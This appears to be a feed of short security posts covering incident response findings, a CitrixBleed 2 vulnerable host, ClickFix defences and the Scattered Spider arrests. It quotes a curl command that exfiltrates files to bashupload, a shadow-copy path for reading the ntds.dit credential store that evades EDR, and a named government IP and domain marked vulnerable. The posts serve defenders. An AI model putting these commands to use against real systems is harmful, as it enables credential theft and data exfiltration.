During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:
curl bashupload[.]com -T your_file.txt

Notably, Palo Alto highlighted this service in a February report, stating:

"The threat actor stored some of the web shells on bashupload[.]com and downloaded and decoded them using certutil." [1]

Given its use in malicious activity, bashupload[.]com is a domain you may want to consider blocking and/or setting up alerts for any network connections.

[1] https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/

If anybody knows anybody at the US Attorney General's office could they please get them to patch CitrixBleed 2? This one multiple threat actors sat on it.

207.218.103.19,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE

During a recent incident response case, we observed the following file access: \\localhost\C$\@ GMT-2025.06.21-10.53.43\Windows\NTDS\ntds.dit

This is a clever method of accessing a Volume Shadow Copy (VSS) snapshot. Many EDR and detection systems typically monitor for commands such as 'vssadmin list shadows', and may trigger alerts based on their use.

However, by leveraging the "Previous Versions" feature in Windows (see screenshot), attackers can select a snapshot, view its properties, and enter the '@ GMT' path directly in Explorer. This allows them to browse the snapshot's contents without needing to use the command line.

Because this technique doesn't rely on typical shadow copy commands, it may evade detection by your EDR or SIEM solution. You might want to test it in your environment to identify and close this potential detection gap 🦸‍♂️🦸‍♀️

Unit42 has yet another write-up on ClickFix with TTPs and IOCs. Maybe consider blocking Win + R and Win + X. @badsamurai has had good results with this.

https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/

#threatIntel

UK police have detained four members of the Scattered Spider group for the recent attacks against UK retailers Marks & Spencer, Co-op, and Harrods

These arrests are the definition of "don't shit where you eat"

https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods

A step by step guide on how to feed the ACARS Drama Engine with the latest version of the adsb.im image!

https://mike-sheward.medium.com/feed-acars-drama-with-adsb-im-a-step-by-step-guide-a78983f6ed18

#avgeek #acars #vdlm2 #sdr